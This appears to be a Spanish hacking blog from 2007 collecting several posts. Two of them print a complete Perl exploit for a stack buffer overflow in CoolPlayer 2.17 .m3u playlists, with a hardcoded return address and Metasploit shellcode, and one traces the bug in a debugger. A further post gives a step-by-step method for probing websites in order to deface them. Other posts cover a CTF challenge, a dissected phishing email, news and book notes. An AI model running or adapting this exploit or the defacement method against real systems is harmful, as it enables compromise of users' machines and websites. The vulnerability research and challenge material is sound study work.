domingo, 30 de diciembre de 2007

Exploit para CoolPlayer 2.17, .m3u

Despues de pasar por algun problemilla...se pudo solucionar y terminar el exploit listo y funcional:

#!/usr/bin/perl
################################################################################
#####################################
#
#CoolPlayer, Latest Build: 217
#Web:: http://coolplayer.sourceforge.net/
#Playlist(.m3u) File Local Buffer Overflow Exploit
#
#Vuln:http://www.securityfocus.com/bid/21396
#
#Instrucciones:coolplayerm3u.pl debe de estar en el mismo directorio que el perl.exe
#
#Agradecimientos a: Luigi Auriemma que ha descubierto una nueva vulnerabilidad en este software junto
# a esta vuln que era antigua y que ha sido redescubierta en un software con adware por mi jeje
# TotalPlayer 3.0(fake de Coolplayer), thanks luigi xDD
# Además del equipo de www.p1mp4m.es -->musashi,patoruzu,elvispresley,pepepistola,skyline2412
#
# Y en especial a este ultimo:skyline2412(puso parte del codigo y me ayudo bastante con la tarea) y
# el_manguan que estuvo ayudando tambien y probando.
#
#Exploit por: Trancek
#Email:trancek@yashira.org
#
################################################################################
######################################
use Cwd;

print "CoolPlayer 2.17 .m3u Exploit\n\n";


$dir = getcwd()."/";
$lon = length($dir);
$nanai = 260 - $lon;
$junk = 'A' x $nanai;
$ret = "\xED\x1E\x95\x7C"; #jmp esp,win xp sp2(spanish)



# win32_exec - EXITFUNC=thread CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x66".
"\x3f\x59\x90\x83\xeb\xfc\xe2\xf4\x9a\xd7\x1d\x90\x66\x3f\xd2\xd5".
"\x5a\xb4\x25\x95\x1e\x3e\xb6\x1b\x29\x27\xd2\xcf\x46\x3e\xb2\xd9".
"\xed\x0b\xd2\x91\x88\x0e\x99\x09\xca\xbb\x99\xe4\x61\xfe\x93\x9d".
"\x67\xfd\xb2\x64\x5d\x6b\x7d\x94\x13\xda\xd2\xcf\x42\x3e\xb2\xf6".
"\xed\x33\x12\x1b\x39\x23\x58\x7b\xed\x23\xd2\x91\x8d\xb6\x05\xb4".
"\x62\xfc\x68\x50\x02\xb4\x19\xa0\xe3\xff\x21\x9c\xed\x7f\x55\x1b".
"\x16\x23\xf4\x1b\x0e\x37\xb2\x99\xed\xbf\xe9\x90\x66\x3f\xd2\xf8".
"\x5a\x60\x68\x66\x06\x69\xd0\x68\xe5\xff\x22\xc0\x0e\xd0\x97\x70".
"\x06\x57\xc1\x6e\xec\x31\x0e\x6f\x81\x5c\x38\xfc\x05\x11\x3c\xe8".
"\x03\x3f\x59\x90";

$nopeando = "\x90" x 20;


open(m3u, ">./vuln.m3u");
print m3u "$junk";
print m3u "$ret";
print m3u "$nopeando";
print m3u "$shellcode";

print "Instrucciones: coolplayerm3u.pl debe de estar en el mismo directorio que el \n";
print "perl.exe o al llamarlo debes de tener el directorio de perl en las variables de entorno \n\n";

print "Directorio: ",$dir,"\n";
print "Longitud del directorio: ",$lon,"\n";
print "Numero de Junk(A) Total: ",$nanai,"\n\n";

print "Cuidado: Cambiar el archivo de directorio, provoca que no funcione el exploit\n";
print "Depende del directorio actual del archivo .m3u y da problemas en el directorio\n";
print "raiz C:\, F:\, etc...(Son 3 'A' mas)\n\n";

print "Archivo creado\n";


Link: http://www.p1mp4m.es/index.php?showtopic=58

martes, 11 de diciembre de 2007

Detecta quién te bloqueó o admite en tu cuenta MSN Messenger - Detector de Estado

Ya que no hablo casi ahora en el blog por poco tiempo, aprovecho para poner un post del blog de paisterist, para hacerle un poco de publicidad jeje, espero que os guste ;)

Paisterist me debes una :P

-----------------------------------------------------------------------------------------
Buenas, hago este post para comentarles mejor de un sitio de mío, Desadmite.com, donde pueden chequear quién te eliminó de su cuenta MSN Messenger. Así, es un detector de estado que deduce quién te bloqueó en el msn analizando tus listas de contactos de la cuenta de MSN Messenger (Passport). Esta web no envía mensajes de MSN a los usuarios de tu lista, sino que, en caso de que lo desees, envía un e-mail como forma de recomendación del sitio. Toma algo así como 10 segundos y tus datos no son almacenados (¿para qué los quiero?).

En fin, con la tranquilidad de que tu cuenta no corre peligro, puedes saber quién te bloqueó, quién te tiene sin admisión o eliminado en su MSN.

Desadmite.com - Descubre quién te bloqueó (o eliminó) de su cuenta MSN Messenger

Saludos

sábado, 1 de diciembre de 2007

Yashira On y Mi reto para el que se atreva

Bueno ahora andan en un VPS configurado todo tal y como quieren, para que sea seguro y resista duros ataques de botnets normalitas. Principalmente, es posible gracias a g30rg3_x y a los que colaboraron dando dinero también: skyline2412, patoruzu y Mcrow. Falta mi colaboración que llegará en cuanto me llegue la tarjeta nueva que con la que tenía no me vale.
Así que en Yashira.org ya pusieron la nueva versión con todos sus retos, entre ellos el mio. Os dejo la descripción del mismo y acuérdense es un reto, que no es real del todo y es así porque la cuestión es aprender y asi no tardar demasiado en encontrar la vulnerabilidad.


Nombre del reto
Mision para Lara Croft

Indicaciones para que funcione bien

1º-Ruta Obligada --> C:\RetoOverflow\reto.exe & C:\RetoOverflow\md5.dll

2º-Hacer el reto con permisos de Administrador para evitar cualquier problema, porque puede que no funcione de no hacerlo así, ya cuando descubran el bug sabrán el porqué, o sino después de que lo encontréis os lo digo yo. (Si sabéis que bug es y aún así no os funciona me decís más que nada porque podria dar algun pequeño problema...pero solo cuando ya sepáis cual es la vulnerabilidad).

3º-Este reto no consiste en buscar en el código del reto con un debugger, de momento, el posible error y por ello está empacado con el themida porque no quiero que miréis el código y lo saquéis así porque sí, hay otros modos de descubrir un bug ademas de ver el código y por ahí va parte del reto.


Como pasar el reto

1º-De momento ,solo será necesario que encuentren el bug, y me envien la prueba de que funciona con argumentos AAAA dando el problema en la dirección 41414141, vamos lo de siempre, un access violation ahí.

2º-Guiaros por la lógica y pensar...seguro lo sacáis pronto.

Futuro

Más adelante espero que esté la version 2 del reto y será algo más complicada porque habrá que ejecutar la calculadora por ejemplo...y como podréis ver más adelante hay trucos, maldito win y las vuln que hay sobre él...ejejej


Para mas información mirar la Ayuda del programa.

Premio

El que lo descubra sin trampas de chivatazos y se lo haya currado le paso el código del reto y ya veré si algo más.



Saludos y Suerte

Link: Reto 172

miércoles, 21 de noviembre de 2007

¿Phising o tontería?

Hoy entro en mi correo y veo un mensaje como lo que me envían últimamente de scam, no se puede registrar la web en ciertos directorios....y bueno los ando guardando todos, para ver al final de año cual ha sido el más original y más creible. Pero resulta que el de hoy no trataba de ello, era un típico correo para quitarte tu cuenta. Yo creo que es la primera vez que me llega uno de un banco, soy feliz jejej pensaba que nunca me llegaría nada así después de tanto tiempo, ahora solo falta que lleguen los virus potentes para asi mirarlos un poquito como son o exploits en archivos.
Ahi va:
------------------------------------------------------------------------
Dear Sir/Madam,

Citibank always looks forward for the high security of our
clients. Some customers have been receiving an email claiming to be
from Citibank advising them to follow a link to what appear
to be a Citibank web site, where they are prompted to enter
their personal Online Banking details. Citibank is in no
way involved with this email and the web site does not belong to us.

Citibank is proud to announce about their new updated secure system.
We updated our new SSL servers to give our customers a better, fast
and secure online banking service.

Due to the recent update of the servers, you are requested to please
update your account info at the following link.

https://web.da-us.citibank.com/cgi-bin/citifi/portal/l/l.do


This web site is operated by Citibank, N.A., Member FDIC Security | Site map | Careers | privacy

Copyright © 2007 Citigroup Inc.


----------------------------------------------

Bonito link ese último..el que en realidad es: http://www.dewithmaaltijden.nl/include/www.citibank.com/Citi/CitiBank/citibank/index.html

Eso si que es sospechoso, por lo que me fijé envia todo a un archivo .php llamado yassino.php , y estuve buscando en google y aparecieron 2 entradas distintas de foros que daban estas webs:

http://www.autolek.com/images/stories/www.bankofameria.com/Online_BofA_Banking/repution/updating.cfmpage=corp_bofacom/yassino.php
http://yourallergysymptoms.com/onlinebnkig-nw-bankofamerica-com/yassino.php

Es muy probable que sea del mismo autor, al menos la primera porque es del mismo estilo, la cosa que no puedo comprobarlas porque andan off. Ala tengan cuidado que esta forma es de las más sencillitas que te encuentras.

PD: Lo envie a Phistank una web que me encontré para publicar phising, parece importante debido a su número elevado de webs con phising enviados.

sábado, 17 de noviembre de 2007

Organizando la 1º Ezine Yashira

Hoy es día de revisar la creación de la ezine, ya que me enviaron un artículo largo pero bastante interesante y además tengo que maquetar otro que tenía por ahí, todavía estoy abierto a más artículos que me quieran enviar y hablaré con los admins de Yashira.org para ver si a los que escriban un artículo que se publique en la ezine se les da una cuenta @yashira.org, de momento cuento con 3 maquetados completamente, 1 hecho casi al completo pero que le faltan imágenes y 2 que me tienen que enviar. La cosa sería llegar a los 10 artículos y publicarlos antes de fin de año o al comienzo de éste, pero no se si dará tiempo. Os aseguro que os gustaran para algo está tardando. Recuerdo el link que dejé en yashira:

--------------------------------------------------------------------------------------
Bueno, pues despues de ver todos los votos y la mayoria a favor del si, solo queda abrir la ezine y ponerse al desarrollo de ella.

Para empezar:

1º-Temas a tratar: Pues relacionados con la informática, hacking, ing inversa, criptografía, programación que se puede incluir en alguna de las anteriores, y algunas curiosidades que haya , o artículos especiales, todo dependerá de la información que haya.
2º-Cómo escribirlos: Bueno pues escribirlos como queráis y en el formato que queráis, eso si nada rarito...xD, luego los pasaré a pdf para que se vea mejor y tal, y se pueden incluir imágenes pero no lo carguen demasiado, teoríaa y práctica estaría bien en todos los artículos que se pueda.
3º-Artículos: No tengo por que publicar todo lo que enviéis, cualquier fallo en el artículo se intentará mirar con todo el staff que lo revise y además se pedirá un nivel medio-alto para la ezine, para hacerla una de las mejores que se pueda, aunque se tarde en publicarla.
4º-Colaboraciones: Enviármelas a mi agregándome al msn trancek@gmail.com(el correo no me funciona...),enviando un correo a trancek@yashira.org o enviarme un MP por yashira posteándome un link para coger la info, me meto a diario así que lo veré ok?
5º-Ortografía: Esto intentar ponerlo con las menores faltas posibles y tal, y bueno para explicar algo no utilicen palabras del país propio para que así todos puedan entender bien el artículo.

Saludos y esperemos que este proyecto vaya hacia delante!!!!

sábado, 10 de noviembre de 2007

Arrestado por espionaje "SyS64738"

Uno de los importantes en la red, Roberto Preatoni(Alias-SyS64738),en el campo de vulnerabilidades y auditorías ha sido detenido por espionaje a Telecom Italia, es famoso por ser el fundador de dos páginas muy famosas en el ámbito del defacing y la auditoría de software, las páginas en cuestión son WabiSabiLabi de la que hablé y que se dedicaba a la venta de vulnerabilidades con sus correspondientes exploits, y además la web para registrar defaces Zone-h. Imparte conferencias en todo el mundo y es el que lleva Hero-Z comics. Respecto al arresto la razón de la detención fue unos ataques junto a otros que no estaban autorizados a hacer los ataques y por realizar intervenciones telefónicas y por ello Telecom Italia les ha denunciado. Así que veremos que pasa y bueno hasta hoy no supe que era también el de Zone-h cosa que me defraudó por ser el creador de la web WabiSabiLabi.

martes, 6 de noviembre de 2007

2º Reto S21sec Labs

La empresa S21sec anda poniendo de vez en cuando retos en su blog en el cual te ponen a prueba y por ahora los 2 retos han sido de Ingeniería Inversa, éste segundo además iba con premio, el libro The Shellcoder's Handbook: Discovering and Exploiting Security Holes (segunda edición). Un libro bastante bueno que estuve pensando en comprarme pero vi el concurso y lo intenté pero al final nada jeje, así que a esperar que vuelvan a ofrecerlo o a comprarlo porque la verdad es bastante bueno por lo que lei en internet.

Crackme

El crackme tenía dos protecciones.

1.- Había que teclear al iniciarse el crackme "S21secLabs - Reto 2"
2.- Tenía una comparación simple.

Asi que el texto claramente podria ser cualquiera que cumpliera esas dos condiciones, y ya que pedían una poesía pues se la dimos, dentro del crackme había una que fue la que aproveche para ponerlo completa, pero no era necesario, ya que como dijimos cualquier texto que cumpla esas 2 cosas vale.

Fueron 5 los que pasaron con sus respectivas soluciones:

- dapaf
- Gadix
- solid
- Tora
- Trancek


Los ganadores fueron elegidos por tiempo, correción de la solución y explicación.A mí la verdad me pareció algo raro el tema de como hicieron la puntuación final.

Tiempo de envío (1-5), Solución correcta (1-10), Explicación (1-5), Total:

dapaf: 5 , 10 , 3 ;18
Gadix: 2 , 8 , 4 ; 14
solid: 5 , 8 , 5 ;18
Tora: 3 , 8 , 4 ; 15
Trancek: 3 , 8 , 4 ; 15

Y así quedó todo, como 3º o 4º sin optar al libro pero bueno, espero que la próxima se me de mejor y sea un premio de estas caracteríticas jeje.

Al menos se pierde con 2 maestros de crackslatinos como son solid y dapaf, suerte a los 2 y espero algún día alcanzaros!!! Y a los demás espero verles en el próximo, que a ellos no les conozco, y Gadix no se si será el mismo que el que se encargaba de los juegos en la época de la web de Karpoff.

sábado, 3 de noviembre de 2007

P1mp4m T34M

Bueno hace nada nos mudamos del Blog de P1mp4m a la web oficial y foro de momento P1mp4m.es en el cual se va a dar ayuda a todos los usuarios que lo necesiten, además de integrar algunos cambios que principalmente no tienen todas las web de este tipo como son: Un laboratorio (la idea que más me gusta), en el cual al principio se cogerá software que tienen vulnerabilidades para estudiarlo y de ese modo aprender, además de poder encontrar otras posibles vulnerabilidades en el mismo software que no estén publicadas, el tipo de aplicaciones principalmente serán las basadas en Web, y muy probable que PHP las que más, pero a lo largo del tiempo si todo va bien, se podría incluir bajo ASP.Net y aplicaciones software (tema bastante interesante).

También se va a incluir una biblioteca con todo tipo de manuales, y artículos escritos por el team o por gente de la comunidad, abarcando temas actuales sobretodo.

Todo esto se está planeando y está quedando montado de tal forma que cuando empiecen a llegar usuarios ya esté finalizada la web.

Así que espero que os guste y disfruten con el contenido y aprendiendo!! Sobretodo hay que ser autodidacta muchas veces pero con ayuda de alguien que siempre viene bien.

P1mp4m

domingo, 28 de octubre de 2007

Fuzzing: Brute Force Vulnerability Discovery (Paperback)

Hoy voy a escribir sobre un libro que me quiero comprar que la verdad me parece muy interesante sus contenidos y que claramente es muy profesional solo hay que ver a los autores que lo han escrito y donde trabajan. Bueno ahi va la descripción que aparece en amazon.com, traducida por mí más o menos bien. En el link de la fuente viene info además sobre los autores.

Autores:
Michael Sutton
Adam Greene
Pedram Amini

Fuzzing
Actualmente es una de las más poderosas técnicas para revelar fallos de seguridad. El fuzzing es una de las formas más efectivas de ver la seguridad del software. Para fuzzear, tu atacas a la entrada de datos de un cógido aleatorio del programa, y después sistemáticamente identificas los fallos que surjan. Los hackers llevan confiando en el fuzzing durante años: Ahora, es tú turno. En este libro, reconocidos expertos en fuzzing te muestran cómo usar el fuzzing para descubrir debilidades en tu software antes de que alguien lo haga.

Fuzzing es el primer y único libro que cubre el fuzzing desde el principio hasta el final, dándote una disciplina mejor para practicar una técnica que ha sido implementada de una manera informal tradicionalmente. Los autores empiezan por revisar como trabaja el fuzzing y como leer entre líneas da ventajas cruciales sobre otras formas de ver la seguridad. Después, ellos introducen lo más reciente en técnicas en el arte del fuzzing para encontrar vulnerabilidades en protocolos de redes, formatos de archivos, y aplicaciones web; demuestran el uso automatizado de las herramientas de fuzzing; y presentan varios casos profundizando como trabaja el fuzzing.

El libro incluye:

  • Porqué el fuzzing simplifica el testeo del diseño y obtiene otros métodos perdidos de encontrar fallos.
  • El proceso del fuzzing: desde identificar entradas de datos a evaluar si es explotable.
  • Entendiendo los requerimientos necesarios para un fuzzing efectivo.
  • Comparaciones entre fuzzers basados en mutación y en generación.
  • Usando y automatizando el fuzzing de variables de entorno y argumentos.
  • Dominando las técnicas de fuzzing en memoria.
  • Construyendo frameworks y herramientas de fuzzing personalizadas.
  • Implementando sistemas inteligentes de deteccion de errores.
Los atacantes normalmente usan fuzzing. Tú deberías también. Si tu eres un programador, ingeniero de seguridad, tester o un especialista QA, este libro te enseñara como construir software seguro.

Índice del libro:

Foreword
Preface
Acknowledgments
About the author

Part I: Background
Chapter 1: Vulnerability Discovery Methodologies
Chapter 2: What Is Fuzzing?
Chapter 3: Fuzzing Methods and Fuzzer Types
Chapter 4: Data Representation and Analysis
Chapter 5: Requirements for Effective Fuzzing

Part II: Targets and Automation
Chapter 6: Automation and Data Generation
Chapter 7: Enviroment Variable and Argument Fuzzing
Chapter 8: Enviroment Variable and Argument Fuzzing: Automation
Chapter 9: Web Application and Server Fuzzing
Chapter 10: Web Application and Server Fuzzing: Automation
Chapter 11: File Format Fuzzing
Chapter 12: File Format Fuzzing: Automation on UNIX
Chapter 13: File Format Fuzzing: Automation on Windows
Chapter 14: Network Protocol Fuzzing
Chapter 15: Network Protocol Fuzzing: Automation on UNIX
Chapter 16: Network Protocol Fuzzing: Automation on Windows
Chapter 17: Web Browser Fuzzing
Chapter 18: Web Browser Fuzzing: Automation
Chapter 19: In-Memory Fuzzing
Chapter 20:In-Memory Fuzzing: Automation

Part III: Advanced Fuzzing Technologies
Chapter 21: Fuzzing Frameworks
Chapter 22: Automated Protocol Dissection
Chapter 23: Fuzzer Tracking
Chapter 24: Intelligent Fault Detection

Part IV: Looking Forward
Chapter 25: Lessons Learned
Chapter 26: Looking Forward

Index

Fuente:Amazon.com - Fuzzing

viernes, 26 de octubre de 2007

Un clic por el bosque

Hace tiempo que entraba en una web, que donaba dinero a una ONG (Aquaverde) cuando se consiguieran 100 Millones de clicks, y eso después de varios meses creo, se ha conseguido, hace pocos meses llevaban una sola décima parte de ello, pero en tan poco tiempo se ha hecho posible y 10.000 euros que van para la ONG, para salvar el bosque del Amazonas y reforestarlo. Ha sido posible a la constante gente que ha entrado a esta web: http://un-clic-por-el-bosque.com/ y a los clicks diarios de cada persona permitidos por IP, espero que para cosas así se utilicen también las botnets jejej, y que haya mas iniciativas de donar dinero de este tipo, ya que mucha gente puede participar con un solo click!!!


Asociación: http://www.aquaverde.org/

miércoles, 24 de octubre de 2007

CoolPlayer 2.17 Stack Overflow

Hago aqui una puqueña introduccion de lo que se hara en el taller de buffer overflow, empezando con los stack, aqui tenemos un software que es explotable. Cuando me puse a buscar fallos en software me encontre con el TotalPlayer 3.0 (una copia de coolplayer con malware) y me entere gracias a una persona en securityfocus, y el totalplayer mostraba seguridad por lo que me puse con el original, el coolplayer 2.17.
El fallo en sí, se encontraba al abrir archivos .m3u con demasiados bytes en su interior (IMG:style_emoticons/default/tongue.gif)

Comencemos:

Despues de ver eso, es hora de irnos a investigar, abrimos el OllySnd por ejemplo:

Yo lo hice de este modo para ver el lugar exacto donde se producia, mire en strings y vi por ahi cosas como playlist y demas, asi que me fui a

0040CAA3 |. 68 C4DA4400 |push coolplay.0044DAC4 ; ASCII "playlist"

y bajando un poco nos encontramos con una funcion muy sospechosa:

0040CBA8 |. FF15 08514300 call ds:[<&KERNEL32.ReadFile>] ; \ReadFile

Ponemos un BP y al abrir el archivo se para ahi, seguimos traceando un poco con f8 y cuando caemos aqui:

0040CC07 |. E8 D4FCFFFF |call coolplay.0040C8E0


El archivo da el problema, asi que lo reiniciamos y lo miramos con f7

de nuevo viendo poco a poco vemos que hay 2 funciones iguales, y como la que tiene que ver con el error es la segunda le ponemos un bp ahi(esto lo he visto traceando poco a poco), es facil, si no sale no preocuparse jeje:

0040C98A |. FF15 20514300 call ds:[<&KERNEL32.lstrcpyA>] ; \lstrcpyA

En ese momento creo que la pila estaba asi:

0013271C 7C809BA8 kernel32.7C809BA8
00132720 FFFFFFFF
00132724 0040CC0C RETURN to coolplay.0040CC0C from coolplay.0040C8E0 -- importante
00132728 003D41D0


y seguimos bajando y caemos en:

0040C9B0 |. 81C4 04010000 add esp,104 -- la pila esta antes de llegar al ret address

---
00132620 505C3A46 -esp
00132624 5C6C7265 --ret address
---

Al tracear una vez mas, el ret adress sta sobreescrito, y esp apunta a la linea de abajo del ret address, por lo que sera mas facil hacer el exploit funcional:


00132620 41414141
00132624 41414141 - ret address sobreescrita(aqui un salto a esp(jmp esp))
00132628 41414141 -esp


Asi que teniendo esto despues de tracearlo con el olly, vamos a crear el exploit:

Para ello utilizare perl, y una shellcode de metasploit (IMG:style_emoticons/default/tongue.gif)

Esto iba a ir a milw0rm, pero de momento no,porque parece ser que no funciona del todo bien en alguna que otra maquina xD

Exploit modificado:


#!/usr/bin/perl
################################################################################
#####################################
#
#CoolPlayer, Latest Build: 217
#Web:: http://coolplayer.sourceforge.net/
#Playlist(.m3u) File Local Buffer Overflow Exploit
#
#Vuln:http://www.securityfocus.com/bid/21396
#
#Instrucciones:coolplayerm3u.pl debe de estar en el mismo directorio que el perl.exe
#
#Agradecimientos a: Luigi Auriemma que ha descubierto una nueva vulnerabilidad en este software junto
# a esta vuln que era antigua y que ha sido redescubierta en un software con adware por mi jeje
# TotalPlayer 3.0(fake de Coolplayer), thanks luigi xDD
# Además del equipo de www.p1mp4m.es -->musashi,patoruzu,elvispresley,pepepistola,skyline2412
#
# Y en especial a este ultimo:skyline2412(puso parte del codigo y me ayudo bastante con la tarea) y
# el_manguan que estuvo ayudando tambien y probando.
#
#Exploit por: Trancek
#Email:trancek@yashira.org
#
################################################################################
######################################
use Cwd;

print "CoolPlayer 2.17 .m3u Exploit\n\n";


$dir = getcwd()."/";
$lon = length($dir);
$nanai = 260 - $lon;
$junk = 'A' x $nanai;
$ret = "\xED\x1E\x95\x7C"; #jmp esp,win xp sp2(spanish)



# win32_exec - EXITFUNC=thread CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x66".
"\x3f\x59\x90\x83\xeb\xfc\xe2\xf4\x9a\xd7\x1d\x90\x66\x3f\xd2\xd5".
"\x5a\xb4\x25\x95\x1e\x3e\xb6\x1b\x29\x27\xd2\xcf\x46\x3e\xb2\xd9".
"\xed\x0b\xd2\x91\x88\x0e\x99\x09\xca\xbb\x99\xe4\x61\xfe\x93\x9d".
"\x67\xfd\xb2\x64\x5d\x6b\x7d\x94\x13\xda\xd2\xcf\x42\x3e\xb2\xf6".
"\xed\x33\x12\x1b\x39\x23\x58\x7b\xed\x23\xd2\x91\x8d\xb6\x05\xb4".
"\x62\xfc\x68\x50\x02\xb4\x19\xa0\xe3\xff\x21\x9c\xed\x7f\x55\x1b".
"\x16\x23\xf4\x1b\x0e\x37\xb2\x99\xed\xbf\xe9\x90\x66\x3f\xd2\xf8".
"\x5a\x60\x68\x66\x06\x69\xd0\x68\xe5\xff\x22\xc0\x0e\xd0\x97\x70".
"\x06\x57\xc1\x6e\xec\x31\x0e\x6f\x81\x5c\x38\xfc\x05\x11\x3c\xe8".
"\x03\x3f\x59\x90";

$nopeando = "\x90" x 20;


open(m3u, ">./vuln.m3u");
print m3u "$junk";
print m3u "$ret";
print m3u "$nopeando";
print m3u "$shellcode";

print "Instrucciones: coolplayerm3u.pl debe de estar en el mismo directorio que el \n";
print "perl.exe o al llamarlo debes de tener el directorio de perl en las variables de entorno \n\n";

print "Directorio: ",$dir,"\n";
print "Longitud del directorio: ",$lon,"\n";
print "Numero de Junk(A) Total: ",$nanai,"\n\n";

print "Cuidado: Cambiar el archivo de directorio, provoca que no funcione el exploit\n";
print "Depende del directorio actual del archivo .m3u y da problemas en el directorio\n";
print "raiz C:\, F:\, etc...(Son 3 'A' mas)\n\n";

print "Archivo creado\n";

sábado, 20 de octubre de 2007

La máquina del tiempo de Internet

¿Alguna vez te has preguntado como sería una web hace tiempo?¿Te has encontrado con que quieres ver como era tu web hace tiempo y no lo guardaste? Este es el momento para ver como era tu web cuando la creaste, poco tiempo después, lo que tarda una web en registrarlo y hacer copias de ella. El servicio en cuestion es: Wayback Internet Machine , la mia todavia no aparece pero es cuestion de tiempo espero. Aquí os dejo una screen por ejemplo de cuando yashira era hackyashira.com, del 2º registro que se hizo en "archives":


Como podemos ver hay un tal rey brujo que tal vez sea el de elhacker.net, el megabyte("dios de la red") jejejeje, el_manguan, gran desaparecido junto a otros que pueden sonar, por lo menos a mi me suenan unos cuantos.
Se ha notado el gran cambio que ha dado yashira hasta el día de hoy, que recuerdos de cuanto entré hace ya...

jueves, 18 de octubre de 2007

Certificaciones de Seguridad

Hoy voy a hablar de estas certificaciones famosas entre los jefes y que les gusta que los empleados las tengan cuando trabajan en seguridad informática, sin saber realmente que algunos son puro papel y diploma y realmente enseñan conocimientos que puedes adquirir tu rápidamente de internet excepto algunos que hay práctica de laboratorio pero a la hora del exámen es solo teórico, para mi perspectiva hay varios problemas en este tipo de certificaciones:

1- El precio de este tipo de certificaciones es muy elevado para mi cartera.
2- Los exámenes suelen ser en inglés excepto el CCNA que puede hacerse en español y por lo tanto te dificulta a lo mejor a la hora de entender perfectamente lo que te pregunta.
3- A la hora de los conocimientos muchas veces se pueden aprender de internet y te ahorras los anteriores problemas.

Por lo tanto, los aconsejo para los que tengan dinero y se lo puedan permitir fácilmente ya que algunas empresas se fijan más en ello, para los que tengan poco lo mejor es esperar tal vez y cuando puedas permitirlo si quieres hacerlo y tal hay buenas empresas que hacen los exámenes en zonas de España y no tienes que viajar muy lejos. A veces, algunas empresas regalan cursos de este tipo a sus empleados pero eso depende de cada una.

Estos días iré poniendo varios tipos de certificaciones con su temario y tal. Hay un larga lista de ellas:

- EC-Council Security Certification
+CHFI - Computer Hacking Forensic Investigator
+CEH - Certified Ethical Hacker
+ECSA - EC-Council Certified Security Analyst
+LPT - Licensed Penetration Tester
- (ISC)²
+CISSP - Certified Information Systems Security Professional
+ISSAP - Information Systems Security Architecture Professional
+ISSMP - Information Systems Security Management Professiona
+ISSEP - Information Systems Security Engineering Professional
+CAP - Certification and Accreditation Professional
+SSCP - Systems Security Certified Practitioner
- Computing Technology Industry Association
+CompTIA Security+
+CompTia A+
- ISACA
+CISA - Certified Information Systems Auditor
+CISM - Certified Information Security Manager
+CGEIT - Certified in the Governance of Enterprise IT
- GIAC
+GIAC - Global Information Assurance Certification
+GREM - GIAC Reverse Engineering Malware
+GHTQ - GIAC Cutting Edge Hacking Techniques
+GWAS - GIAC Web Application Security
- CISCO
+CCENT - Cisco Certified Entry Networking Technician
+CCNA - Cisco Certified Network Associate
+CCSP - Cisco Certified Security Professional
+CCIE - Cisco Certified Internetwork Expert
- Microsoft
+MCP - Microsoft Certified Professional
+MCSA - Microsoft Certified System Associate
+MCSE - Microsoft Certified System Engineer
- Next Generation Security
+NSC - NGSEC Security Certification

martes, 16 de octubre de 2007

Auditoria de una pagina a nivel Web

Esta vez voy a hablar de como vulnerar una web de un modo general y sencillo, es decir, los pasos que tenemos que seguir generalmente para encontrar posibles fallos para defacear una web y ya de paso también sirva a los webmasters que quieran comprobar la seguridad de su web y asi estar siempre mas seguros. Asi que os muestro mas o menos mi metodologia que utilizo yo. Para ello haremos un riguroso analisis de la web en cuestion.

Podemos seguir estos 10 sencillos pasos:

1-Mirar con que lenguaje se programo la web: Php, Asp, Html, XML, Flash...
1.1- Html: seguramente haya que buscar otro modo, como por el servidor o mirar a ver si hay alguna parte que no sea html
1.2- Javascript, Flash, Java...paginas que contienen partes importantes en estos lenguajes como autentificacion pueden ser vulnerados facilmente, ya que se puede conseguir el codigo.
1.3- Asp, Php, XML...suelen tener graves problemas ya que se puede hacer muchas cosas con esos lenguajes, en esta nos centraremos a nivel web muchas veces.

2-Buscar si la pagina web es un paquete precompilado tipo CMS, por ejemplo, como Joomla, Php-Nuke, etc. Si lo es suele ser algo a nuestro favor ya que dispondriamos del codigo porque es libre y visible para todos.

3-Ver si existe robots.txt que sirve para ver directorios ocultos que el robot de google por ejemplo mira para que no cachee esos directorios, suele dar info de cosas importantes como directorio del admin.

4-Uso de buscadores para encontrar posibles archivos o directorios importantes: site:www.sitio.com eso encontraria varios enlaces en lo que podria estar alguno importante.

5-Directorios y archivos comunes: admin.***, administracion.***, login.***, etc y entre directorios: /zona admin/;/administracion/...etc. Un programa que da buenos resultados en busqueda de directorios es el acunetix que suele buscar directorios comunes en los que puede a ver logueos y demas.

6-Referenciado al punto 2, se podria buscar posibles fallos de ese paquete en www.milw0rm.com del colega str0ke, pagina que suele albergar todo tipo de exploits.

7-En caso de no encontrar nada ahi o en otras webs, tantear y probar tu mismo en sistemas de logueo de usuarios, de administracion, de busqueda, etc, inyecciones o sino en variables mediante GET O POST inclusiones, XSS, y otros tipos de vulnerabilidades.

8-Si nada de esto funciona la cosa es ponerse a investigar en el codigo tu mismo si lo tienes disponible, para ello deberas saber mas informacion de como y donde se producen las tipicas vulnerabilidades.

9-Un meto alternativo ya fuera de esto seria la Ingenieria Social, pero que no he probado ya que nunca he atacado un servidor especifico por algun motivo pero suele ser muy buena debilidad porque los empleados no estan preparados como deberian estarlo.

10-Otras formas ya que no tienen que ver con este texto, como es entrar por el servidor o ir a la empresa y hacer a lo espia, ahi con tu traje negro como si fueras uno mas, asi seguro te lo pases mejor.

*Un metodo bastante importante que se me olvidaba es buscar si es un servidor compartido para ello tenemos la herramienta Reverse IP de Seologs y a partir de ahi buscar en otras webs para lograr entrar al servidor y al fin llegar a la nuestra.


Este texto principalmente esta hecho rapidamente y para que tengan una idea mas o menos asi que es posible que la cague por las prisas y bueno como me lo pidieron varios usuarios de yashira.org pues me anime a escribirlo aunque es algo que se va aprendiendo con la experiencia, espero que al menos os guie un poco.

Cualquier cosa decirme y lo cambio, aun asi mañana le dare un vistacillo si saco tiempo, ademas me acostumbrare a poner tildes que no las suelo poner para evitar problemas.

sábado, 13 de octubre de 2007

Yashira OFF, por mucho tiempo?

Comunicado de Pescaodeth
-------------------------------------------------------

Yashira Regresa?
Publicado por PescaoDeth - 12-10-07 19:44
Muchos se preguntarón que sucedió.

para resumir todo... dejaré los mensajes enviados por DH fué como sigue:
CITA

Hello,


Your account has been permanently disabled for violations of our Terms of Service (operation of "hacking"/computer intrusion sites, presence of unauthorized copyrighted materials). It will not be re-enabled.


Jeff,

------------------------------------

luego de un petición para recuperar los backups correspondientes y una posible reactivación, la respuesta fué la siguiente:
"Tomando en cuenta que tardaron de 2 días en enviar la respuesta (total ya pagamos así que led dá igual)". y dando como escusa que nuestro sitio se trata principalmente de wargames y similares orienta a comprender las distintas ramas de informática.

CITA

This is a commonly heard excuse, but it rings hollow. Not only are some
of the tools you have under your account clearly meant for brute force
attacks against others, you are also engaging in copyright infringement
